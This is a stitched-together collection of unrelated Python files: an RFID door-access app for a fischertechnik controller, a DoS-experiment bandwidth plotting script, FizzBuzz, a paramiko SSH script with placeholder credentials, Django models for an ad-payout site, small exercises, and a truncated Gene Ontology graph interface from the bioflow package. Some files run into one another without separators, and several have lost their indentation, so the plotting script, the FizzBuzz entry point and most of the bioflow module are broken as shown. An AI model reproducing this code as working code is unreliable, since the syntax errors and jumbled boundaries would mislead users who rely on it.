        lbl.setWordWrap(True)
        lbl.setAlignment(Qt.AlignCenter)
        vbox.addWidget(lbl)

        self.centralWidget.setLayout(vbox)

        self.done = False

        # start a qtimer to check for a tag to write
        self.timer = QTimer(self)
        self.timer.timeout.connect(self.on_timer)
        self.timer.start(100)

    def on_timer(self):
        """Poll for a card; once present, authenticate and write block 8."""
        (status, TagType) = self.MIFAREReader.MFRC522_Request(self.MIFAREReader.PICC_REQIDL)
        if status != self.MIFAREReader.MI_OK:
            return

        # Get the UID of the card
        (status, uid) = self.MIFAREReader.MFRC522_Anticoll()

        # If we have the UID, continue
        if status != self.MIFAREReader.MI_OK:
            return

        # Select the scanned tag
        self.MIFAREReader.MFRC522_SelectTag(uid)

        # Authenticate
        status = self.MIFAREReader.MFRC522_Auth(self.MIFAREReader.PICC_AUTHENT1A, 8, KEY, uid)

        # Check if authenticated
        if status == self.MIFAREReader.MI_OK:
            # Variable for the data to write
            data = []
            # Fill the 16-byte block with zeros first
            for x in range(0, 16):
                data.append(0)
            # access token only when permission checkbox is ticked
            if self.check.isChecked():
                data[0] = 0x42;
            # name goes into bytes 1..15
            for i in range(len(self.name.text())):
                data[i+1] = ord(self.name.text()[i])
            if self.MIFAREReader.MFRC522_Write(8, data):
                self.done = True
            self.MIFAREReader.MFRC522_StopCrypto1()

        self.MIFAREReader.MFRC522_Request(self.MIFAREReader.PICC_REQIDL)

        if self.done:
            self.timer.stop()
            print("closing")
            self.close()
class FtcGuiApplication(TouchApplication):
    """RFID access-control application for the TXT controller.

    Polls an RC522 reader; cards whose block 8 starts with 0x42 are
    "accepted" (green lamp, door motor opens), others are "denied"
    (red lamp). Lamp/motor sequencing is driven by a single-shot timer
    state machine (``on_io_event``).
    """

    def __init__(self, args):
        TouchApplication.__init__(self, args)

        translator = QTranslator()
        path = os.path.dirname(os.path.realpath(__file__))
        translator.load(QLocale.system(), os.path.join(path, "rfid_"))
        self.installTranslator(translator)

        # create the empty main window
        self.w = TouchWindow("RFID")
        self.vbox = QVBoxLayout()
        self.vbox.addStretch()

        # probe for the RC522 reader; None when absent or not answering
        try:
            self.MIFAREReader = MFRC522.MFRC522()
            if not self.MIFAREReader.MFRC522_Present():
                self.MIFAREReader = None
        except IOError:
            self.MIFAREReader = None

        if not self.MIFAREReader:
            # no reader: show an explanatory message instead of the UI
            lbl = QLabel(QCoreApplication.translate("main",
                                                    "Unable to connect to " +
                                                    "RC522 RFID reader.\n\n" +
                                                    "Make sure one is " +
                                                    "connected via USB or I²C."))
            lbl.setObjectName("smalllabel")
            lbl.setWordWrap(True)
            lbl.setAlignment(Qt.AlignCenter)
            self.vbox.addWidget(lbl)
        else:
            # get access to TXTs IOs if present
            txt_ip = os.environ.get('TXT_IP')
            if txt_ip == None: txt_ip = "localhost"
            try:
                self.txt = ftrobopy.ftrobopy(txt_ip, 65000)
            except:
                # best effort: run without lamps/motors when no TXT IO is reachable
                self.txt = None

            menu = self.w.addMenu()
            self.menu_cfg = menu.addAction(QCoreApplication.translate("menu", "Setup card"))
            self.menu_cfg.triggered.connect(self.setup)

            # status text, status icon and card-holder name labels
            self.label = QLabel("")
            self.label.setObjectName("smalllabel")
            self.label.setAlignment(Qt.AlignCenter)
            self.vbox.addWidget(self.label)

            self.icon = QLabel("")
            self.icon.setAlignment(Qt.AlignCenter)
            self.vbox.addWidget(self.icon)

            self.name = QLabel("")
            self.name.setObjectName("smalllabel")
            self.name.setAlignment(Qt.AlignCenter)
            self.vbox.addWidget(self.name)

            self.setState("searching")

            # start a qtimer to poll the sensor
            self.timer = QTimer(self)
            self.timer.timeout.connect(self.on_timer)
            self.timer.start(100)

            # and a timer to handle lamps and motors
            self.io_timer = QTimer(self)
            self.io_timer.timeout.connect(self.on_io_event)
            self.io_timer.setSingleShot(True)
            self.io_state = None

        self.vbox.addStretch()
        self.w.centralWidget.setLayout(self.vbox)

        self.w.show()
        self.exec_()

    def on_io_event(self):
        """Single-shot timer callback: step the door/lamp state machine.

        Sequence on accept: "open" (motor stops) -> "wait" (2 s) ->
        "close" (reverse motor, green off) -> idle. On deny: "light"
        switches the red lamp off again.
        """
        if self.io_state == "open":
            self.txt.setPwm(MOTOR, 0)
            self.io_state = "wait"
            self.io_timer.start(2000)
        elif self.io_state == "wait":
            self.txt.setPwm(MOTOR+1, 400)
            self.txt.setPwm(GREEN, 0)
            self.io_state = "close"
            self.io_timer.start(1000)
        elif self.io_state == "close":
            self.txt.setPwm(MOTOR+1, 0)
            self.io_state = None
        elif self.io_state == "light":
            self.txt.setPwm(RED, 0)
            self.io_state = None

    def setup(self):
        """Open the card-setup dialog; card polling is paused meanwhile."""
        self.timer.stop()
        dialog = SetupDialog(self.MIFAREReader, self.w)
        dialog.exec_()
        # wait 2 seconds before scanning again
        self.timer.start(2000)

    def setState(self, state, message=None):
        """Update status label/icon and trigger matching lamp/motor actions.

        :param state: one of "searching", "ok", "nok"
        :param message: optional card-holder name shown below the icon
        """
        icon = None
        if state == "searching":
            self.label.setText(QCoreApplication.translate("status", "Searching ..."))
            icon = "searching"
        if state == "ok":
            self.label.setText(QCoreApplication.translate("status", "Accepted!"))
            icon = "granted"
            if self.txt:
                self.txt.setPwm(GREEN, 512)
                self.txt.setPwm(MOTOR, 400)
                self.io_state = "open"
                self.io_timer.start(1000)   # wait one second
        if state == "nok":
            self.label.setText(QCoreApplication.translate("status", "Denied!"))
            icon = "denied"
            if self.txt:
                self.txt.setPwm(RED, 512)
                self.io_state = "light"
                self.io_timer.start(1000)   # wait one second

        if icon:
            # icons (searching/granted/denied .png) live next to this script
            name = os.path.join(os.path.dirname(os.path.realpath(__file__)), icon + ".png")
            pix = QPixmap(name)
            self.icon.setPixmap(pix)

        if message:
            self.name.setText(message)
        else:
            self.name.setText("")

    def on_timer(self):
        """Poll the reader; read block 8 of a present card and grant/deny."""
        (status, TagType) = self.MIFAREReader.MFRC522_Request(self.MIFAREReader.PICC_REQIDL)
        if status != self.MIFAREReader.MI_OK:
            self.setState("searching")
            self.timer.start(100)
            return

        # Get the UID of the card
        (status, uid) = self.MIFAREReader.MFRC522_Anticoll()

        # If we have the UID, continue
        if status != self.MIFAREReader.MI_OK:
            self.setState("searching")
            self.timer.start(100)
            return

        print("UID:", uid)
        print("Card read UID: "+str(uid[0])+","+str(uid[1])+","+str(uid[2])+","+str(uid[3]))

        # Select the scanned tag
        self.MIFAREReader.MFRC522_SelectTag(uid)

        # Authenticate
        status = self.MIFAREReader.MFRC522_Auth(self.MIFAREReader.PICC_AUTHENT1A, 8, KEY, uid)

        # Check if authenticated
        if status == self.MIFAREReader.MI_OK:
            data = self.MIFAREReader.MFRC522_Read(8)
            if data:
                # wait a second before scanning again
                print("Received:", data)
                # decode name from bytes 1..14 (zero bytes are skipped)
                name = ""
                for i in range(1, 15):
                    if data[i]:
                        name = name + chr(data[i])
                # check if data contains a valid "access token"
                if data[0] == 0x42:
                    self.setState("ok", name)
                else:
                    self.setState("nok", name)
                self.timer.start(1000)
            else:
                self.setState("searching")
            self.MIFAREReader.MFRC522_StopCrypto1()
        else:
            # this happens most likely since the user removed
            # the card early
            self.setState("searching")
            return

        self.MIFAREReader.MFRC522_Request(self.MIFAREReader.PICC_REQIDL)
if __name__ == "__main__":
FtcGuiApplication(sys.argv)
|
from helper import *
import plot_defaults
from matplotlib.ticker import MaxNLocator
from pylab import figure
import os, re, string
parser = argparse.ArgumentParser()
parser.add_argument('--dir', '-d',
help="Directory where data exist",
required = True)
args = parser.parse_args()
dirs = [f for f in os.listdir(args.dir)]
data = []
for d in dirs:
plen = int(re.match('p-([0-9]+)', d).group(1))
testd = [f for f in os.listdir(os.path.join(args.dir, d))]
aggregated = 0.0
for test in testd:
file_path = os.path.join(args.dir, d, test, "result.txt")
with open(file_path, 'r') as result_file:
aggregated += float(result_file.readlines()[1].strip())
aggregated /= len(testd)
aggregated /= 1.5
data.append([plen, aggregated])
m.rc('figure')
fig = figure()
ax = fig.add_subplot(111)
def getkey(item):
return item[0]
data_sort = sorted(data, key=getkey)
xaxis = map(float, col(0, data_sort))
yaxis = map(float, col(1, data_sort))
ax.plot(xaxis, yaxis, lw=2)
plt.ylabel("Aggregated Normalized Bandwidth")
plt.xlabel("Inter-burst DoS Period(ms)")
plt.grid(True)
plt.tight_layout()
plt.savefig(args.dir + ".png")
|
"""Return fizzbuzz list until the number from input."""
from __future__ import print_function
def fizz_buzz(number):
    """Return the FizzBuzz sequence from 1 to *number* as a comma-separated string.

    Multiples of 3 map to "Fizz", multiples of 5 to "Buzz", multiples of
    both to "FizzBuzz"; all other values are rendered as themselves.
    (The original docstring claimed a list was returned; the function has
    always returned a joined string.)

    :param number: inclusive upper bound; 0 or negative yields "".
    :return: comma-separated sequence, e.g. "1,2,Fizz,4,Buzz".
    """
    parts = []
    for i in range(1, number + 1):
        if i % 15 == 0:  # divisible by both 3 and 5
            parts.append("FizzBuzz")
        elif i % 3 == 0:
            parts.append("Fizz")
        elif i % 5 == 0:
            parts.append("Buzz")
        else:
            parts.append(str(i))
    return ",".join(parts)
def main():
    """Prompt repeatedly for a natural number and print its FizzBuzz line.

    Typing "exit" terminates the program; non-numeric input prints an
    error message and the loop continues.
    """
    while True:
        answer = input("Please write a natural number: ")
        if answer == "exit":
            exit(0)
        try:
            value = int(answer)
        except ValueError:
            # input was not a number
            print("This is not a natural number!")
        else:
            print(fizz_buzz(value))
if __name__ == "__main__":
main()
|
import paramiko
import time

# Open an interactive shell over SSH and dump the output of a few CLI
# commands ("scope chassis"/"show psu" suggests a Cisco IMC-style device;
# TODO confirm).
ssh = paramiko.SSHClient()  # BUG FIX: was misspelled "parmiko" (NameError at runtime)
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# NOTE(review): placeholder credentials -- replace before use; avoid
# hard-coding passwords in source.
ssh.connect('ipaddress', username='username', password='password')
chan = ssh.invoke_shell()

chan.send('show version\r')
while not chan.recv_ready():
    time.sleep(5)
out = chan.recv(99999)
print(out.decode("ascii"))

chan.send('scope chassis\r')
chan.send('show psu\r')
while not chan.recv_ready():
    time.sleep(5)
out = chan.recv(99999)  # BUG FIX: was "chan.rev(...)" (AttributeError at runtime)
print(out.decode("ascii"))

ssh.close()
|
def frequencySort(self, s: str) -> str:
    """Rebuild *s* with characters grouped and ordered by descending frequency.

    Ties keep Counter's insertion order (first appearance in *s*).
    """
    frequency_pairs = collections.Counter(s).most_common()
    chunks = []
    for character, count in frequency_pairs:
        chunks.append(character * count)
    return ''.join(chunks)
from django.db.models import *
from django.contrib.auth.models import User
# Choice tuples for model fields: (stored value, human-readable label).

# Support-ticket priority levels.
priority = [
    ('Normal', 'Normal'),
    ('High', 'High'),
    ('Urgent', 'Urgent'),
    ('Immediate', 'Immediate'),
]

# Lifecycle states of a payment.
payment_status = [
    ('Waiting For Payment', 'Waiting For Payment'),
    ('Paid', 'Paid'),
    ('Payment Canceled', 'Payment Canceled'),
    ('In Progress', 'In Progress'),
]

# Moderation states of a submitted site (also reused for support status below).
site_status = [
    ('Under Review', 'Under Review'),
    ('Approved', 'Approved'),
    ('Declined', 'Declined'),
]

# Origin of a support-thread message.
addedby = [
    ('Admin', 'Admin'),
    ('User', 'User')
]
class Page(Model):
    """A page record: title, role identifier and optional description."""
    title = TextField(default='', blank=False, null=False, verbose_name='title')
    pagerole = TextField(default='', blank=False, null=False, verbose_name='pagerole')
    description = TextField(default='', blank=True, null=True, verbose_name='description')
    created = DateTimeField(auto_now_add=True)
class Site(Model):
    """A website registered by a user, subject to moderation (site_status)."""
    user = ForeignKey(User, on_delete=CASCADE, default=None)
    name = TextField(default='', blank=False, null=False, verbose_name='name')
    webaddress = TextField(default='', blank=False, null=False, verbose_name='webaddress')
    websitelanguage = TextField(default='', blank=False, null=False, verbose_name='websitelanguage')
    websitetraffic = TextField(default='', blank=True, null=True, verbose_name='websitetraffic')
    site_status = TextField(default='', choices=site_status, blank=False, null=False, verbose_name='site_status')
    created = DateTimeField(auto_now_add=True)
class Widget(Model):
    """A widget attached to a Site (type/subtype, layout position, CSS).

    Deleting the owning site cascades to its widgets.
    """
    site = ForeignKey('Site', related_name='widgets', on_delete=CASCADE, null=True)
    name = TextField(default='', blank=False, null=False, verbose_name='name')
    widgettitle = TextField(default='', blank=False, null=False, verbose_name='widgettitle')
    type = TextField(default='', blank=False, null=False, verbose_name='type')
    subtype = TextField(default='', blank=True, null=True, verbose_name='subtype')
    column = TextField(default='', blank=True, null=True, verbose_name='column')
    rows = TextField(default='', blank=True, null=True, verbose_name='rows')
    # BUG FIX: verbose_name was 'subtype', a copy-paste of the field above.
    wid = TextField(default='', blank=True, null=True, verbose_name='wid')
    css = TextField(default='', blank=True, null=True, verbose_name='css')
    created = DateTimeField(auto_now_add=True)
class Support(Model):
    """A support ticket opened by a user; messages hang off it via Message."""
    user = ForeignKey(User, on_delete=CASCADE, default=None)
    subject = TextField(default='', blank=False, null=False, verbose_name='subject')
    priority = TextField(default='', choices=priority, blank=False, null=False, verbose_name='priority')
    # NOTE(review): reuses the site moderation choices and verbose_name
    # 'site_status' -- looks like a copy-paste from Site; confirm intent.
    status = TextField(default='', blank=False, null=False, choices=site_status, verbose_name='site_status')
    created = DateTimeField(auto_now_add=True)
class Message(Model):
    """A single message in a support thread, tagged with its author type."""
    support = ForeignKey('Support', related_name='messages', on_delete=CASCADE, null=True)
    text = TextField(default='', blank=False, null=False, verbose_name='text')
    addedby = TextField(default='', choices=addedby, blank=False, null=False, verbose_name='addedby')
    created = DateTimeField(auto_now_add=True)
class Payment(Model):
    """A payout to a user with its lifecycle status."""
    user = ForeignKey(User, on_delete=CASCADE, default=None)
    # NOTE(review): monetary amount stored as free text, not a numeric field.
    total = TextField(default='', blank=False, null=False, verbose_name='total')
    payment_status = TextField(default='', choices=payment_status, blank=False, null=False,
                               verbose_name='payment_status')
    created = DateTimeField(auto_now_add=True)
class Paypal(Model):
    """A user's PayPal payout configuration."""
    user = ForeignKey(User, on_delete=CASCADE, default=None)
    type = TextField(default='', blank=False, null=False, verbose_name='type')
    currency = TextField(default='', blank=False, null=False, verbose_name='currency')
    country = TextField(default='', blank=False, null=False, verbose_name='country')
    paymentthreshold = TextField(default='', blank=False, null=False, verbose_name='paymentthreshold')
    payeename = TextField(default='', blank=False, null=False, verbose_name='payeename')
    paypalemail = TextField(default='', blank=False, null=False, verbose_name='paypalemail')
    payeephone = TextField(default='', blank=False, null=False, verbose_name='payeephone')
    payeeaddress = TextField(default='', blank=False, null=False, verbose_name='payeeaddress')
    created = DateTimeField(auto_now_add=True)
class Epayment(Model):
    """A user's e-wallet payout configuration."""
    user = ForeignKey(User, on_delete=CASCADE, default=None)
    type = TextField(default='', blank=False, null=False, verbose_name='type')
    paymentthreshold = TextField(default='', blank=False, null=False, verbose_name='paymentthreshold')
    ewallet = TextField(default='', blank=False, null=False, verbose_name='ewallet')
    created = DateTimeField(auto_now_add=True)
class Payoneer(Model):
    """A user's Payoneer payout configuration."""
    user = ForeignKey(User, on_delete=CASCADE, default=None)
    type = TextField(default='', blank=False, null=False, verbose_name='type')
    paymentthreshold = TextField(default='', blank=False, null=False, verbose_name='paymentthreshold')
    payeename = TextField(default='', blank=False, null=False, verbose_name='payeename')
    country = TextField(default='', blank=False, null=False, verbose_name='country')
    # NOTE(review): a field named 'paypalemail' on the Payoneer model looks
    # like a copy-paste from Paypal -- confirm whether this should be a
    # Payoneer account email before renaming (rename requires a migration).
    paypalemail = TextField(default='', blank=False, null=False, verbose_name='paypalemail')
    created = DateTimeField(auto_now_add=True)
class Webmoney(Model):
    """A user's WebMoney payout configuration (WMZ purse)."""
    user = ForeignKey(User, on_delete=CASCADE, default=None)
    type = TextField(default='', blank=False, null=False, verbose_name='type')
    currency = TextField(default='', blank=False, null=False, verbose_name='currency')
    paymentthreshold = TextField(default='', blank=False, null=False, verbose_name='paymentthreshold')
    wmz = TextField(default='', blank=False, null=False, verbose_name='wmz')
    created = DateTimeField(auto_now_add=True)
class RfCompany(Model):
    """Per-company banner-load / click counters (referrer stats)."""
    companyname = TextField(default='', blank=False, null=False, verbose_name='companyname')
    bannerloads = PositiveIntegerField(default=0)
    clicks = PositiveIntegerField(default=0)
    date = DateField(auto_now_add=True)
    time = TimeField(auto_now_add=True)
    created = DateTimeField(auto_now_add=True)
class DashboardCompany(Model):
    """Per-company banner-load / click counters shown on the dashboard.

    NOTE(review): identical field set to RfCompany -- candidates for a
    shared abstract base model.
    """
    companyname = TextField(default='', blank=False, null=False, verbose_name='companyname')
    bannerloads = PositiveIntegerField(default=0)
    clicks = PositiveIntegerField(default=0)
    date = DateField(auto_now_add=True)
    time = TimeField(auto_now_add=True)
    created = DateTimeField(auto_now_add=True)
class Revenue(Model):
    """Per-company revenue total at a point in time."""
    companyname = TextField(default='', blank=False, null=False, verbose_name='companyname')
    date = DateField(auto_now_add=True)
    time = TimeField(auto_now_add=True)
    totalmoney = PositiveIntegerField(default=0)
    created = DateTimeField(auto_now_add=True)
|
from math import sqrt

# Classic exercise: for each input d, compute D = sqrt((2 * C * d) / H)
# with C = 50 and H = 30, and print the rounded result.
q = int(input("ENTER NUMBER OF INPUTS"))
# BUG FIX: the accumulator was named `list`, shadowing the builtin.
values = []
for i in range(q):
    q1 = int(input())
    values.append(q1)
C = 50
H = 30
for i in values:
    D = sqrt(((2 * C * i) / H))
    print(round(D))
# Minimal demo of a phone directory keyed by (last-name, first-name) tuples.
directory = {}
first = 'chris'
last = 'gidden'
number = 2
directory[(last, first)] = number
print(number)
# iterating a dict yields its keys -- here (last, first) tuples
for key in directory:
    surname, given = key
    print(given, surname, directory[key])
from station import StationList
from zoopla import Zoopla
from zoopla.exceptions import ZooplaAPIException
import os
# Query the Zoopla API for the average sold price around every station.
# Raises KeyError immediately if the ZOOPLA_KEY environment variable is unset.
zoopla = Zoopla(api_key=os.environ['ZOOPLA_KEY'], verbose=True)

for station in StationList().stations:
    # NOTE(review): `name` is built but never used below -- leftover?
    name = '{} Station'.format(station.name)
    latitude, longitude = station.parse_location()
    try:
        prices = zoopla.average_area_sold_price({
            'latitude': str(latitude),
            'longitude': str(longitude),
            'order': 'ascending',
            'page_number': 1,
            'page_size': 1
        })
    except ZooplaAPIException as e:
        # best effort: report the API error and continue with the next station
        print(e)
        continue
    print(prices)

#
# for result in search.listing:
#     print(result.price)
#     print(result.description)
#     print(result.image_url)
#
# for j in Journey.objects().order_by('best'):
#     print(j)
#
# Generated by Django 2.2.7 on 2019-12-01 10:04
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Auto-generated: adds Question.start_date and drops the Choice model.

    NOTE(review): DeleteModel is destructive -- all Choice rows are removed
    when this migration is applied.
    """

    dependencies = [
        ('polls', '0006_auto_20191201_1749'),
    ]

    operations = [
        migrations.AddField(
            model_name='question',
            name='start_date',
            field=models.DateTimeField(default=django.utils.timezone.now, verbose_name='Starts at : '),
        ),
        migrations.DeleteModel(
            name='Choice',
        ),
    ]
|
#!/usr/bin/env python
import numpy as np
############################################################### Periodic boundary utility
#periodic boundary for relative position vector
def wrap(vector, box):
    """Wrap a relative position vector into the primary periodic image.

    Each component is shifted by a whole multiple of ``box`` so the result
    lies in ``[-box/2, box/2)``. Works element-wise on numpy arrays.
    """
    image_offset = np.floor(vector / box + 0.5) * box
    return vector - image_offset
|
"""
Contains all the tools necessary to map GO ontology and Pathway classification from the
database to an Adjacency and Laplacian graph.
"""
import hashlib
import json
import pickle
import random
import string
import math
import datetime
from collections import defaultdict
from copy import copy
from random import shuffle, sample
from csv import reader
from itertools import combinations, chain
from pprint import PrettyPrinter
from random import shuffle
from time import time
import traceback, sys
from typing import Union, Tuple, List
import numpy as np
from scipy.sparse import lil_matrix, triu
from scipy.sparse.csgraph import shortest_path
from bioflow.algorithms_bank import conduction_routines as cr
from bioflow.configs import main_configs as confs
from bioflow.configs.main_configs import Dumps, NewOutputs
from bioflow.sample_storage.mongodb import insert_annotome_rand_samp
from bioflow.molecular_network.InteractomeInterface import InteractomeInterface
from bioflow.neo4j_db.GraphDeclarator import DatabaseGraph
from bioflow.utils.gdfExportInterface import GdfExportInterface
from bioflow.utils.io_routines import dump_object, undump_object, get_background_bulbs_ids
from bioflow.utils.log_behavior import get_logger
from bioflow.algorithms_bank import sampling_policies
from bioflow.algorithms_bank.flow_calculation_methods import general_flow,\
reduce_and_deduplicate_sample, evaluate_ops, reduce_ops
from bioflow.algorithms_bank.sampling_policies import characterize_flow_parameters, _is_int
log = get_logger(__name__)
# a pair of debug functions
def _characterise(_object):
print('Object of size %s and type %s' % (len(_object), type(_object)))
def _characterise_mat(matrix):
    """Debug helper: print shape, type and non-zero count of a sparse/dense matrix.

    NOTE(review): the min/max slots in the format string are filled with the
    literal placeholders '<>' rather than computed values -- apparently
    deliberately stubbed out; confirm before relying on this output.
    """
    print('Matrix of shape %s, type %s and has %s non-zero terms, min is %s, max is %s' % \
          (matrix.shape, type(matrix), len(matrix.nonzero()[0]), '<>', '<>'))
class GeneOntologyInterface(object):
"""
Interface between annotome in the knowledge database and the annotome graph laplacian. It is
heavily skewed towards the Gene Ontology, although can be adapted to be more general than that.
:param namespace_filter: which namespaces will be used from the annotome (by default the
"biological process" of the Gene Ontology)
:param background: (optional) background that will be used for sampling of random
nodes to build a comparison interface for the
:param correction_factor:informativity of the node computation correction factors
(information entropy-wise). (Multiplicative correction factor, additive correction factor)
:param ultraspec_clean: whether terms considered too specific are excluded
:param ultraspec_lvl: how many uniprots have to be annotated by a term (directly or
indirectly) for it not to be considered too specific
"""
# REFACTOR: [BKI normalization]: move to neo4j parse/insertion types
_go_up_types = ["is_a_go", "is_part_of_go"]
_go_reg_types = ["is_Regulant"]
def __init__(self,
             namespace_filter=confs.env_bki_filter,
             background=(),
             correction_factor=confs.env_bki_correlation_factors,
             ultraspec_clean=confs.env_bki_ultraspec_clean,
             ultraspec_lvl=confs.env_bki_ultraspec_lvl):
    # configuration handed in (defaults come from the bioflow configs module)
    self.go_namespace_filter = list(namespace_filter)
    self._background = background
    log.debug('_background set to %d' % len(background))
    self.correction_factor = correction_factor
    self.ultraspec_cleaned = ultraspec_clean
    self.ultraspec_lvl = ultraspec_lvl
    # wall-clock bookkeeping used by pretty_time() / _time()
    self.init_time = time()
    self.partial_time = time()

    # entity <-> annotation-term mappings (neo4j ids)
    self.entity_2_terms_neo4j_ids = defaultdict(list)
    self.known_up_ids = set()
    self.term_2_entities_neo4j_ids = defaultdict(list)
    self.all_nodes_neo4j_ids = []
    # node id <-> matrix index translation
    self.node_id_2_mat_idx = {}
    self.mat_idx_2_note_id = {}
    self.total_entropy = None

    # memoization caches for reachability / informativity computations
    self._limiter_reachable_nodes_dict = {}
    self._limiter_up_2_go_reachable_nodes = {}
    self._limiter_go_2_up_reachable_nodes = {}
    self._limiter_up_2_go_step_reachable_nodes = {}
    self._limiter_go_2_up_step_reachable_nodes = {}
    self._limiter_go_2_weighted_ent = {}

    # id <-> human-readable name translation tables
    self.neo4j_id_2_display_name = {}
    self.neo4j_id_2_legacy_id = {}
    self.legacy_id_2_neo4j_id = {}
    self.up_neo4j_id_2_leg_id_disp_name = {}

    # graph matrices: 2x2 zero placeholders until actually built
    self.adjacency_matrix = np.zeros((2, 2))
    self.dir_adj_matrix = np.zeros((2, 2))
    self.laplacian_matrix = np.zeros((2, 2))
    self.inflated_laplacian = np.zeros((2, 2))
    self.inflated_idx2lbl = {}
    self.inflated_lbl2idx = {}
    self.binding_intensity = 0

    # REFACTOR: [stateless]: this needs to be passed as an argument, not a persistent variable
    self._active_up_sample: List[int] = []
    self._active_weighted_sample: List[Tuple[int, float]] = []
    self._secondary_weighted_sample: Union[None, List[Tuple[int, float]]] = None
    # pluggable flow-computation strategies
    self._flow_calculation_method = general_flow
    self._ops_evaluation_method = evaluate_ops
    self._ops_reduction_method = reduce_ops

    # flow-computation results
    self.UP2UP_voltages = {}
    self.uniprots_2_voltage = {}
    self.current_accumulator = np.zeros((2, 2))
    self.node_current = {}

    # random hex tag identifying this instance (useful with multiprocessing)
    char_set = string.ascii_uppercase + string.digits
    self.thread_hex = ''.join(random.sample(char_set * 6, 6))

    self.indep_lapl = np.zeros((2, 2))

    log.info('Setting up GO Interface with namespaces %s and %s background UPs',
             self.go_namespace_filter, len(self._background))
def pretty_time(self):
    """
    Times the execution.

    :return: string with the time since the creation of this object and
        since the last call of this function, formatted as "X m Y s"
    :rtype: str
    """
    it, pt = (round(time() - self.init_time),
              round(time() - self.partial_time))
    # BUG FIX: was "int(it) / 60" -- true division under Python 3, which
    # printed minutes as floats (e.g. "1.5 m 30 s"). Floor division keeps
    # the minutes integral.
    pload = 'total: %s m %s s, \t partial: %s m %s s' % (
        it // 60, it % 60, pt // 60, pt % 60)
    self.partial_time = time()
    return pload
def _time(self):
    """Seconds elapsed since the last partial-time checkpoint (not reset here)."""
    return time() - self.partial_time
def reset_thread_hex(self):
    """
    Reset the hex identifier of the object. Used when multiprocessing,
    so each worker gets a distinct tag in the logs.

    :return:
    """
    alphabet = string.ascii_uppercase + string.digits
    self.thread_hex = ''.join(sample(alphabet * 6, 6))
def _dump_statics(self):
    # Persist the construction parameters so fast_load() can later verify
    # that the cached state matches the currently requested configuration.
    dump_object(
        confs.Dumps.GO_builder_stat,
        (self.go_namespace_filter,
         self._background,
         # it does dump the _background from which it will attempt to rebuild itself.
         self.correction_factor,
         self.ultraspec_cleaned,
         self.ultraspec_lvl))
@staticmethod
def _undump_statics():
    # Counterpart of _dump_statics(): returns the persisted parameter tuple.
    return undump_object(confs.Dumps.GO_builder_stat)
def dump_core(self):
    """Pickle the core mapping structures of the interface to the GO dump file.

    The tuple order must stay in sync with _undump_core().
    """
    core_state = (self.entity_2_terms_neo4j_ids,
                  self.term_2_entities_neo4j_ids,
                  self._limiter_reachable_nodes_dict,
                  self.neo4j_id_2_display_name,
                  self.neo4j_id_2_legacy_id,
                  self.legacy_id_2_neo4j_id,
                  self.all_nodes_neo4j_ids,
                  self.node_id_2_mat_idx,
                  self.mat_idx_2_note_id,
                  self.up_neo4j_id_2_leg_id_disp_name)
    dump_object(confs.Dumps.GO_dump, core_state)
def _undump_core(self):
    # Restore the core mappings in the exact order dump_core() wrote them.
    self.entity_2_terms_neo4j_ids, self.term_2_entities_neo4j_ids, self._limiter_reachable_nodes_dict, \
        self.neo4j_id_2_display_name, self.neo4j_id_2_legacy_id, self.legacy_id_2_neo4j_id, self.all_nodes_neo4j_ids, \
        self.node_id_2_mat_idx, self.mat_idx_2_note_id, self.up_neo4j_id_2_leg_id_disp_name = \
        undump_object(confs.Dumps.GO_dump)
    # derived: the set of uniprot ids the annotome knows about
    self.known_up_ids = self.entity_2_terms_neo4j_ids.keys()
def _dump_matrices(self):
    # Persist the adjacency / directed-adjacency / laplacian matrices.
    dump_object(
        confs.Dumps.GO_Mats,
        (self.adjacency_matrix,
         self.dir_adj_matrix,
         self.laplacian_matrix))
def _undump_matrices(self):
    # Counterpart of _dump_matrices(): restore the three graph matrices.
    self.adjacency_matrix, self.dir_adj_matrix, self.laplacian_matrix = undump_object(
        confs.Dumps.GO_Mats)
def _dump_informativities(self):
    # Persist the reachability / informativity caches.
    # NOTE(review): self.GO2_Pure_Inf is not initialized in __init__ --
    # presumably set during the reach computation; dumping before that
    # step would raise AttributeError. Confirm call ordering.
    dump_object(
        confs.Dumps.GO_Infos,
        (self._limiter_up_2_go_reachable_nodes,
         self._limiter_go_2_up_reachable_nodes,
         self._limiter_up_2_go_step_reachable_nodes,
         self._limiter_go_2_up_step_reachable_nodes,
         self.GO2_Pure_Inf,
         self._limiter_go_2_weighted_ent))
def _undump_informativities(self):
    # Restore the caches in the order _dump_informativities() wrote them.
    self._limiter_up_2_go_reachable_nodes, self._limiter_go_2_up_reachable_nodes, self._limiter_up_2_go_step_reachable_nodes, \
        self._limiter_go_2_up_step_reachable_nodes, self.GO2_Pure_Inf, self._limiter_go_2_weighted_ent = \
        undump_object(confs.Dumps.GO_Infos)
def _dump_inflated_elements(self):
    # Persist the inflated laplacian and its index/label translation tables.
    dump_object(
        confs.Dumps.GO_Inflated,
        (self.inflated_laplacian,
         self.inflated_idx2lbl,
         self.inflated_lbl2idx,
         self.binding_intensity))
def _undump_inflated_elements(self):
    # Counterpart of _dump_inflated_elements().
    self.inflated_laplacian, self.inflated_idx2lbl, \
        self.inflated_lbl2idx, self.binding_intensity = \
        undump_object(confs.Dumps.GO_Inflated)
def _dump_memoized(self):
    """Persist the current analysis state (sample, currents, voltages),
    keyed by an md5 of the active sample and a system hash."""
    # hash of the sorted active sample so the cache can be matched later
    md5 = hashlib.md5(
        json.dumps(sorted(self._active_up_sample), sort_keys=True).encode('utf-8')).hexdigest()
    payload = {
        'UP_hash': md5,
        # NOTE(review): md5_hash() is defined elsewhere in this class
        'sys_hash': self.md5_hash(),
        'UPs': pickle.dumps(self._active_up_sample),
        'currents': pickle.dumps((self.current_accumulator, self.node_current)),
        'voltages': pickle.dumps(self.uniprots_2_voltage)}
    dump_object(confs.Dumps.GO_Analysis_memoized, payload)
@staticmethod
def _undump_memoized():
    """
    :return: undumped memoized analysis payload (dict written by _dump_memoized)
    """
    return undump_object(confs.Dumps.GO_Analysis_memoized)
def _dump_independent_linear_sets(self):
    # Persist the independence laplacian.
    dump_object(confs.Dumps.GO_Indep_Linset, self.indep_lapl)
def _undump_independent_linear_sets(self):
    # Counterpart of _dump_independent_linear_sets().
    self.indep_lapl = undump_object(confs.Dumps.GO_Indep_Linset)
def full_rebuild(self):
    """
    Performs a complete rebuild of the InterfaceClass Instance based on parameters provided
    upon construction, using the data in the knowledge database. Upon rebuild, saves a copy
    that can be rapidly resurrected with the fast_load() method.

    :return: None
    """
